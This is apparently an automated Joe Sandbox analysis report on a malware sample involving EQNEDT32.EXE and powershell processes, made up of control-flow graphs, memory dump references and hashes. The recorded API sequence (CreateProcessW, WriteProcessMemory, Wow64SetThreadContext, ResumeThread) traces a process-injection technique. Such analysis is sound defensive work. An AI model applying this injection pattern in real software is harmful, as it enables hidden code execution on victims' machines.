                                                                                                                                      Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                                                                                                                                      Imagebase:0x400000
                                                                                                                                      File size:543'304 bytes
                                                                                                                                      MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Reputation:high
                                                                                                                                      Has exited:false

                                                                                                                                      Reset < >
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.375304689.00000000001AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 001AD000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_1ad000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: a513ddf491fb59a62fc3b8842a0e9f7c913720de7b537135fea9e06e59781a80
                                                                                                                                        • Instruction ID: 9c9af4874e0da5cba2e84ffae615a9a52706580b852aa3302afef4ec6d4006e3
                                                                                                                                        • Opcode Fuzzy Hash: a513ddf491fb59a62fc3b8842a0e9f7c913720de7b537135fea9e06e59781a80
                                                                                                                                        • Instruction Fuzzy Hash: 67018C6100D3C09FD7124B259D98752BFB8EF53620F1984DBE8858F5A3C2685C45CB72
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.375304689.00000000001AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 001AD000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_1ad000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 858b31ff73412566f0ae88eee74b9f8009f307a21fbd36426c664eec7b946c7a
                                                                                                                                        • Instruction ID: 6dc4c85faf66f0714c2133c2485faf07c3f3c5fb7232edbecc234dacaa1ff8a0
                                                                                                                                        • Opcode Fuzzy Hash: 858b31ff73412566f0ae88eee74b9f8009f307a21fbd36426c664eec7b946c7a
                                                                                                                                        • Instruction Fuzzy Hash: 1101F775104740DFE7104A25D9C4B67BF98DF52760F28C165FC4A0B682C3799841CAB1

                                                                                                                                        Execution Graph

                                                                                                                                        Execution Coverage:3.5%
                                                                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                                                                        Signature Coverage:0%
                                                                                                                                        Total number of Nodes:31
                                                                                                                                        Total number of Limit Nodes:7
                                                                                                                                        execution_graph 6567 2573a0 6568 2573f0 WriteProcessMemory 6567->6568 6569 2573e8 6567->6569 6570 25742b 6568->6570 6569->6568 6571 410fe8 6572 41115e 6571->6572 6573 411013 6571->6573 6573->6572 6577 254b40 6573->6577 6581 254b31 6573->6581 6574 4110f3 6579 254b53 6577->6579 6578 254b94 6578->6574 6579->6578 6585 255dea 6579->6585 6583 254b40 6581->6583 6582 254b94 6582->6574 6583->6582 6584 255dea 2 API calls 6583->6584 6584->6583 6586 255e09 6585->6586 6587 255e61 6586->6587 6590 256508 ResumeThread 6586->6590 6592 2565b8 6586->6592 6587->6579 6591 255f31 6590->6591 6591->6586 6593 2565c6 6592->6593 6594 256508 ResumeThread 6593->6594 6595 255f31 6593->6595 6594->6595 6595->6586 6596 256fe8 6597 257017 CreateProcessW 6596->6597 6599 257141 6597->6599 6600 257228 6601 257274 Wow64SetThreadContext 6600->6601 6602 25726a 6600->6602 6603 2572a2 6601->6603 6602->6601
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000008.00000002.369432967.0000000000410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00410000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_8_2_410000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: @#|e$@#|e$@#|e$@#|e$L4#p$L4#p$L4#p
                                                                                                                                        • API String ID: 0-1454169059
                                                                                                                                        • Opcode ID: 7df4219a95518ddb4767287ae621c19a0c05b9290653088f8d28a99de24f9c2b
                                                                                                                                        • Instruction ID: f6495f4ea39326bf784fca50f2241109b8fbb8bc2967c3064f9876cdc0466dd2
                                                                                                                                        • Opcode Fuzzy Hash: 7df4219a95518ddb4767287ae621c19a0c05b9290653088f8d28a99de24f9c2b
                                                                                                                                        • Instruction Fuzzy Hash: 63F23A78A002149FDB14DF14C990EAAF7B6FB89314F24C59AEC1997351CB32AE92DF50

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 326 410a5d-410a60 327 410a62-410a64 326->327 328 410a66-410a6e 326->328 327->328 329 410a70-410a76 328->329 330 410a86-410a8a 328->330 333 410a78 329->333 334 410a7a-410a84 329->334 331 410a90-410a94 330->331 332 410beb-410bf5 330->332 337 410aa7 331->337 338 410a96-410aa5 331->338 335 410c03-410c09 332->335 336 410bf7-410c00 332->336 333->330 334->330 340 410c0b-410c0d 335->340 341 410c0f-410c1b 335->341 342 410aa9-410aab 337->342 338->342 343 410c1d-410c3b 340->343 341->343 342->332 344 410ab1-410ad1 342->344 350 410af0 344->350 351 410ad3-410aee 344->351 352 410af2-410af4 350->352 351->352 352->332 353 410afa-410afc 352->353 355 410b0c 353->355 356 410afe-410b0a 353->356 358 410b0e-410b10 355->358 356->358 358->332 359 410b16-410b36 358->359 362 410b38-410b3e 359->362 363 410b4e-410b52 359->363 366 410b40 362->366 367 410b42-410b44 362->367 364 410b54-410b5a 363->364 365 410b6c-410b70 363->365 368 410b5c 364->368 369 410b5e-410b6a 364->369 370 410b77-410b79 365->370 366->363 367->363 368->365 369->365 372 410b91-410be8 370->372 373 410b7b-410b81 370->373 374 410b83 373->374 375 410b85-410b87 373->375 374->372 375->372
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000008.00000002.369432967.0000000000410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00410000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_8_2_410000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: @#|e$@#|e$h<'$h<'
                                                                                                                                        • API String ID: 0-1032004603
                                                                                                                                        • Opcode ID: f4c1712882a761742327a910caf224424b1d4fd0e8f078f6146f043ced5c4f20
                                                                                                                                        • Instruction ID: 6f222b6bcaaec5ed8596d129e4ded621fa9825452e0d70d9cc8462c25395eeb5
                                                                                                                                        • Opcode Fuzzy Hash: f4c1712882a761742327a910caf224424b1d4fd0e8f078f6146f043ced5c4f20
                                                                                                                                        • Instruction Fuzzy Hash: 9741F331708312CBDB285AB498106FBB3A1AFA1355B208077C955DB381EEF9DDC1C76A

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 377 256bd4-256be0 379 256c13-256fe4 377->379 380 256be2-256c0f 377->380 381 257017-257061 379->381 382 256fe6-257012 379->382 380->379 384 257063-257066 381->384 385 257069-257070 381->385 382->381 384->385 387 257072-257078 385->387 388 25707b-257091 385->388 387->388 390 257093-257099 388->390 391 25709c-25713f CreateProcessW 388->391 390->391 393 257141-257147 391->393 394 257148-2571c0 391->394 393->394 401 2571d2-2571d9 394->401 402 2571c2-2571c8 394->402 403 2571f0 401->403 404 2571db-2571ea 401->404 402->401 406 2571f1 403->406 404->403 406->406
                                                                                                                                        APIs
                                                                                                                                        • CreateProcessW.KERNEL32(00000000,?,00000009,?,?,?,?,?,?,?), ref: 0025712C
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000008.00000002.369390490.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_8_2_250000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CreateProcess
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 963392458-0
                                                                                                                                        • Opcode ID: cec8dc2e598e13471f833f85bf95bea2e49fd79cfa29fe05c6bf3613825c1e9f
                                                                                                                                        • Instruction ID: 598fb2fca214043fdb6904de24e05b42278add4eb0e6ec7d163326aa179f26e8
                                                                                                                                        • Opcode Fuzzy Hash: cec8dc2e598e13471f833f85bf95bea2e49fd79cfa29fe05c6bf3613825c1e9f
                                                                                                                                        • Instruction Fuzzy Hash: E7617B718053998FEB21CF69DC90BDDBFB1AF05305F0581EAD808AB251D6355A98CF64

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 407 256fe8-257061 409 257063-257066 407->409 410 257069-257070 407->410 409->410 411 257072-257078 410->411 412 25707b-257091 410->412 411->412 413 257093-257099 412->413 414 25709c-25713f CreateProcessW 412->414 413->414 416 257141-257147 414->416 417 257148-2571c0 414->417 416->417 424 2571d2-2571d9 417->424 425 2571c2-2571c8 417->425 426 2571f0 424->426 427 2571db-2571ea 424->427 425->424 429 2571f1 426->429 427->426 429->429
                                                                                                                                        APIs
                                                                                                                                        • CreateProcessW.KERNEL32(00000000,?,00000009,?,?,?,?,?,?,?), ref: 0025712C
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000008.00000002.369390490.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_8_2_250000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CreateProcess
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 963392458-0
                                                                                                                                        • Opcode ID: d8603b7484ab712fa569f60c3a171b8e476a245957efd6ed36b11bfff7058137
                                                                                                                                        • Instruction ID: 557d7c27d6b7994f6d18604c5acda469547720070e887f440ae6a25fe5d0e3a5
                                                                                                                                        • Opcode Fuzzy Hash: d8603b7484ab712fa569f60c3a171b8e476a245957efd6ed36b11bfff7058137
                                                                                                                                        • Instruction Fuzzy Hash: 8D51287190122ADFEF24CF99D840BDDBBB5BF48301F1085AAE909B7250D7319A98CF60

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 430 25739e-2573e6 432 2573f0-257429 WriteProcessMemory 430->432 433 2573e8-2573ee 430->433 434 257432-257453 432->434 435 25742b-257431 432->435 433->432 435->434
                                                                                                                                        APIs
                                                                                                                                        • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0025741C
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000008.00000002.369390490.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_8_2_250000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MemoryProcessWrite
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3559483778-0
                                                                                                                                        • Opcode ID: eaa22ee557865d5e856f14c9f29a4fa2ecfec1ad742c3cd4eab7ca938f57c330
                                                                                                                                        • Instruction ID: 0933c786149fea1d8a1e7f06ebeae8e97e2ee0ceef6b8f0b3ce75c9cb0593cdc
                                                                                                                                        • Opcode Fuzzy Hash: eaa22ee557865d5e856f14c9f29a4fa2ecfec1ad742c3cd4eab7ca938f57c330
                                                                                                                                        • Instruction Fuzzy Hash: 022127B1910309DFDB10CF9AD884BDEBBF4FB48350F10842AE818A7240D378A954CFA5

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 437 2573a0-2573e6 438 2573f0-257429 WriteProcessMemory 437->438 439 2573e8-2573ee 437->439 440 257432-257453 438->440 441 25742b-257431 438->441 439->438 441->440
                                                                                                                                        APIs
                                                                                                                                        • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0025741C
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000008.00000002.369390490.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_8_2_250000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MemoryProcessWrite
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3559483778-0
                                                                                                                                        • Opcode ID: 60aa0439ba8a0908947be54694eb20addb351f586b6c48cfd650bdf606aa2763
                                                                                                                                        • Instruction ID: b1c2e4976166af8d0fa0ee64c3224eb613336436194f38abd0bae99c8aafeba3
                                                                                                                                        • Opcode Fuzzy Hash: 60aa0439ba8a0908947be54694eb20addb351f586b6c48cfd650bdf606aa2763
                                                                                                                                        • Instruction Fuzzy Hash: 8E2127B1910309DFDB10CF9AD884BDEBBF4FB48350F10842AE818A7200D378A954CFA5

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 443 257220-257268 445 257274-2572a0 Wow64SetThreadContext 443->445 446 25726a-257272 443->446 447 2572a2-2572a8 445->447 448 2572a9-2572ca 445->448 446->445 447->448
                                                                                                                                        APIs
                                                                                                                                        • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 00257293
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000008.00000002.369390490.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_8_2_250000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ContextThreadWow64
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 983334009-0
                                                                                                                                        • Opcode ID: 3ba2b6fb41bd7fba6318cdc0f562162cbf908368cc73e352534db7f805f2c7f9
                                                                                                                                        • Instruction ID: a5398fd13f24fe645cf052655a719a0f3a59bc44170b97e7a92c31bddfa2d4bd
                                                                                                                                        • Opcode Fuzzy Hash: 3ba2b6fb41bd7fba6318cdc0f562162cbf908368cc73e352534db7f805f2c7f9
                                                                                                                                        • Instruction Fuzzy Hash: 371159B2D0024A8FDB10CF9AD844BDEFBF4EB89320F14812AD858A7250D378A544CFA5

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 450 257228-257268 451 257274-2572a0 Wow64SetThreadContext 450->451 452 25726a-257272 450->452 453 2572a2-2572a8 451->453 454 2572a9-2572ca 451->454 452->451 453->454
                                                                                                                                        APIs
                                                                                                                                        • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 00257293
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000008.00000002.369390490.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_8_2_250000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ContextThreadWow64
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 983334009-0
                                                                                                                                        • Opcode ID: 46d8c65fec60e5a9833fb2ea4a9fbefb16df629c1b27acf306961c1e50a92396
                                                                                                                                        • Instruction ID: 04babbe6a2bdcae071bbd6936454ada341743474ed3e2db08b601a88f4e74e09
                                                                                                                                        • Opcode Fuzzy Hash: 46d8c65fec60e5a9833fb2ea4a9fbefb16df629c1b27acf306961c1e50a92396
                                                                                                                                        • Instruction Fuzzy Hash: 6A1146B2D10209CFDB10CF9AD844BDEFBF4EB89360F14842AE858A7240D378A545CFA5

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 456 2565b8-2565c8 call 25182c 459 2565ce-2565dc 456->459 460 256508-256546 ResumeThread 456->460 463 2565e2-2565e5 459->463 464 255fad-255fb0 459->464 461 25654f-25655c 460->461 462 256548-25654e 460->462 465 256562-256573 461->465 466 256a5b-256a62 461->466 462->461 463->464 467 255fb6-256845 464->467 468 2568b0-2568b9 464->468 465->464 470 256579-25657c 465->470 467->464 476 25684b-25684e 467->476 471 2568bf-2568d2 468->471 472 256968-256988 468->472 470->464 471->464 471->472 479 256993-256996 472->479 480 25698a-25698f 472->480 476->464 481 2569b3-2569ca 479->481 482 256998 479->482 480->479 481->479 490 2569cc 481->490 482->481 483 25699f-2569ad 482->483 484 2569ce-2569d7 482->484 485 2569f8-256ab0 482->485 483->479 486 2569af-2569b1 483->486 488 2569ff-256a21 484->488 489 2569d9-2569e3 484->489 486->479 496 256a27-256a2a 488->496 497 255f31-255f34 488->497 498 2569e5-2569ea 489->498 499 2569ec-2569f6 call 254a84 489->499 490->479 496->497 500 256a34-256a4d 497->500 501 255f3a 497->501 498->479 499->485 505 256991 499->505 500->497 504 256a53-256a56 500->504 501->488 504->497 505->479
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000008.00000002.369390490.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_8_2_250000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ResumeThread
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 947044025-0
                                                                                                                                        • Opcode ID: 0554bea3c152b0ac8a37609426e0f094c7bfb98bce49556b6622dc7d7bc3c67d
                                                                                                                                        • Instruction ID: 1c6eca55307620e004a969e49b9a23b593b3d828cbca9b2245097e56c38bd178
                                                                                                                                        • Opcode Fuzzy Hash: 0554bea3c152b0ac8a37609426e0f094c7bfb98bce49556b6622dc7d7bc3c67d
                                                                                                                                        • Instruction Fuzzy Hash: 5611F130920215CFEB20CF14D85CB98B7B1BB01306FA081D9E808AB6A5D3749DDDCF1A

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 506 256508-256546 ResumeThread 507 25654f-25655c 506->507 508 256548-25654e 506->508 509 256562-256573 507->509 510 256a5b-256a62 507->510 508->507 512 255fad-255fb0 509->512 513 256579-25657c 509->513 514 255fb6-256845 512->514 515 2568b0-2568b9 512->515 513->512 514->512 521 25684b-25684e 514->521 516 2568bf-2568d2 515->516 517 256968-256988 515->517 516->512 516->517 524 256993-256996 517->524 525 25698a-25698f 517->525 521->512 526 2569b3-2569ca 524->526 527 256998 524->527 525->524 526->524 535 2569cc 526->535 527->526 528 25699f-2569ad 527->528 529 2569ce-2569d7 527->529 530 2569f8-256ab0 527->530 528->524 531 2569af-2569b1 528->531 533 2569ff-256a21 529->533 534 2569d9-2569e3 529->534 531->524 541 256a27-256a2a 533->541 542 255f31-255f34 533->542 543 2569e5-2569ea 534->543 544 2569ec-2569f6 call 254a84 534->544 535->524 541->542 545 256a34-256a4d 542->545 546 255f3a 542->546 543->524 544->530 550 256991 544->550 545->542 549 256a53-256a56 545->549 546->533 549->542 550->524
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000008.00000002.369390490.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_8_2_250000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ResumeThread
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 947044025-0
                                                                                                                                        • Opcode ID: 23239db7210d92645524f19268dfc1391060a7e9a1f4be2acb8fbfb70a8b8461
                                                                                                                                        • Instruction ID: b8726dd90a137daf013cb89b60927ba0d44629932d19230f903b1ef9fa440e66
                                                                                                                                        • Opcode Fuzzy Hash: 23239db7210d92645524f19268dfc1391060a7e9a1f4be2acb8fbfb70a8b8461
                                                                                                                                        • Instruction Fuzzy Hash: 9501AF30920214CFEB20CF54D85C798BBB1EB11316F6080DAE4086B695C3B44EDDCF26
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000008.00000002.369432967.0000000000410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00410000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_8_2_410000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: @#|e
                                                                                                                                        • API String ID: 0-1040833717
                                                                                                                                        • Opcode ID: 4ff0349cb0245fac028f2f0ce6cc657ddb3829a494fe82bafd850fb05ba15c50
                                                                                                                                        • Instruction ID: b3c283bb4e08a13d8969bcd33efcbfccff88573aa63fa08309f65fd6c75d5a0b
                                                                                                                                        • Opcode Fuzzy Hash: 4ff0349cb0245fac028f2f0ce6cc657ddb3829a494fe82bafd850fb05ba15c50
                                                                                                                                        • Instruction Fuzzy Hash: CC314831A01255EFCF64CF18C944BEABBB2AB49300F0481ABE61586771C37AD9D5CB85

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 1113 41298f-4129b7 1114 4129e4-412a00 1113->1114 1115 4129b9-4129be 1113->1115 1122 412a10-412a1a 1114->1122 1123 412a03-412a0e 1114->1123 1116 4129c0-4129c6 1115->1116 1117 4129d6-4129de 1115->1117 1119 4129c8 1116->1119 1120 4129ca-4129d4 1116->1120 1121 4129e3 1117->1121 1119->1117 1120->1117 1126 412a20-412a31 1122->1126 1127 412ada-412aec 1122->1127 1123->1122 1132 412a33-412a39 1126->1132 1133 412a4b-412a68 1126->1133 1130 412b18 1127->1130 1131 412aee-412af9 1127->1131 1136 412b26-412b33 1130->1136 1134 412b08-412b0e 1131->1134 1135 412afb-412b07 1131->1135 1137 412a3b 1132->1137 1138 412a3d-412a49 1132->1138 1133->1127 1142 412a6a-412a8c 1133->1142 1134->1136 1141 412b10-412b16 1134->1141 1135->1134 1140 412b34-412b5f 1135->1140 1137->1133 1138->1133 1149 412b61-412b66 1140->1149 1150 412b8c-412ba9 1140->1150 1141->1130 1145 412b1a-412b24 1141->1145 1151 412aa6-412abe 1142->1151 1152 412a8e-412a94 1142->1152 1145->1136 1153 412b68-412b6e 1149->1153 1154 412b7e-412b8b 1149->1154 1161 412bb8-412bc2 1150->1161 1162 412bab-412bb4 1150->1162 1165 412ac0-412ac2 1151->1165 1166 412acc-412ad7 1151->1166 1156 412a96 1152->1156 1157 412a98-412aa4 1152->1157 1158 412b70 1153->1158 1159 412b72-412b7c 1153->1159 1156->1151 1157->1151 1158->1154 1159->1154 1170 412bc4 1161->1170 1171 412bcb-412bdf 1161->1171 1162->1161 1165->1166 1170->1171
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000008.00000002.369432967.0000000000410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00410000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_8_2_410000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: e2d781e63d77453c5dc50daa7428be08b5415350ec424589cdb9517f697de771
                                                                                                                                        • Instruction ID: f579c88f12515ae112b63054f93d964162a82ee15258d07569dcd80489ce3db3
                                                                                                                                        • Opcode Fuzzy Hash: e2d781e63d77453c5dc50daa7428be08b5415350ec424589cdb9517f697de771
                                                                                                                                        • Instruction Fuzzy Hash: 8841F630A093849FC7218B24C95079ABFB1EF86310F1980DBD544DF293C7B59C92C756

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 1173 412d50-412d60 1174 412d70 1173->1174 1175 412d62-412d6e 1173->1175 1176 412d72-412d74 1174->1176 1175->1176 1177 412e12-412e1c 1176->1177 1178 412d7a-412d7c 1176->1178 1181 412e27-412e2d 1177->1181 1182 412e1e-412e24 1177->1182 1179 412d8c 1178->1179 1180 412d7e-412d8a 1178->1180 1183 412d8e-412d90 1179->1183 1180->1183 1184 412e33-412e3f 1181->1184 1185 412e2f-412e31 1181->1185 1183->1177 1186 412d96-412d9c 1183->1186 1187 412e41-412e5a 1184->1187 1185->1187 1188 412daa-412dec 1186->1188 1189 412d9e-412da0 1186->1189 1196 412e5d-412e62 1188->1196 1197 412dee-412df5 1188->1197 1189->1188 1196->1197 1200 412dfd-412e0c 1197->1200 1200->1177
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000008.00000002.369432967.0000000000410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00410000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_8_2_410000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: e391a17c876a0e112b0334976b747b8b5afe1bc9d07cf1bd0be05f91e9dec221
                                                                                                                                        • Instruction ID: f93bea8c5fd629468eb8b02304a9f1e5a90310fa723806abffea7adc2788fa70
                                                                                                                                        • Opcode Fuzzy Hash: e391a17c876a0e112b0334976b747b8b5afe1bc9d07cf1bd0be05f91e9dec221
                                                                                                                                        • Instruction Fuzzy Hash: F62147313103119BDB245675D910BBB67D59BD4312F20843BE90ADB3C0DAF9DCA183B6
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000008.00000002.369432967.0000000000410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00410000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_8_2_410000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 2254732c79c81f8cb0508e4c8e49ebbf1f28840763da01316a044b17c8f1c1fd
                                                                                                                                        • Instruction ID: 54ea1ff7862f01b125875352582dce92e7aff0c154bbbda860c36ec97d32c6ed
                                                                                                                                        • Opcode Fuzzy Hash: 2254732c79c81f8cb0508e4c8e49ebbf1f28840763da01316a044b17c8f1c1fd
                                                                                                                                        • Instruction Fuzzy Hash: 682146317103049BDB216A7098123FFB751EB89310F20806BE5458B351CBFAC8C387A6
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000008.00000002.369284722.000000000019D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0019D000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_8_2_19d000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 8154422f7927161f9f047af355a0f6fe728b5cce2647b24e410df125b6578314
                                                                                                                                        • Instruction ID: 9ce65d440b387f79ae722fd242d4e7592b290680138ba08d63675da236a62a51
                                                                                                                                        • Opcode Fuzzy Hash: 8154422f7927161f9f047af355a0f6fe728b5cce2647b24e410df125b6578314
                                                                                                                                        • Instruction Fuzzy Hash: 3201A271504344EBEB104A26ECC4B67BF98EF51764F2CC56AFC890B282C3799845CAB2
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000008.00000002.369284722.000000000019D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0019D000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_8_2_19d000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: d8c64d39ff9d85de7d27c8354a8051a2946e6e259f78464645ca9b06a6060398
                                                                                                                                        • Instruction ID: 3085f533540775e0f6e33083e93a74cc52a796f852f2cdc583de8ef9f5e485cd
                                                                                                                                        • Opcode Fuzzy Hash: d8c64d39ff9d85de7d27c8354a8051a2946e6e259f78464645ca9b06a6060398
                                                                                                                                        • Instruction Fuzzy Hash: FBF06D71504344AFEB108A16DCC8B66FF98EB51764F28C55AFD884E282C3799C45CAB2
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000008.00000002.369432967.0000000000410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00410000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_8_2_410000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 137bb7c9ba2b1b7b0e0cdc42bc46e75d475c0395be655f1c6a6ba43730a0a397
                                                                                                                                        • Instruction ID: 28bc72453d40ce03cd65314cc2a0faeee5bb5eec4a6d82521fd7acb7befe5f4a
                                                                                                                                        • Opcode Fuzzy Hash: 137bb7c9ba2b1b7b0e0cdc42bc46e75d475c0395be655f1c6a6ba43730a0a397
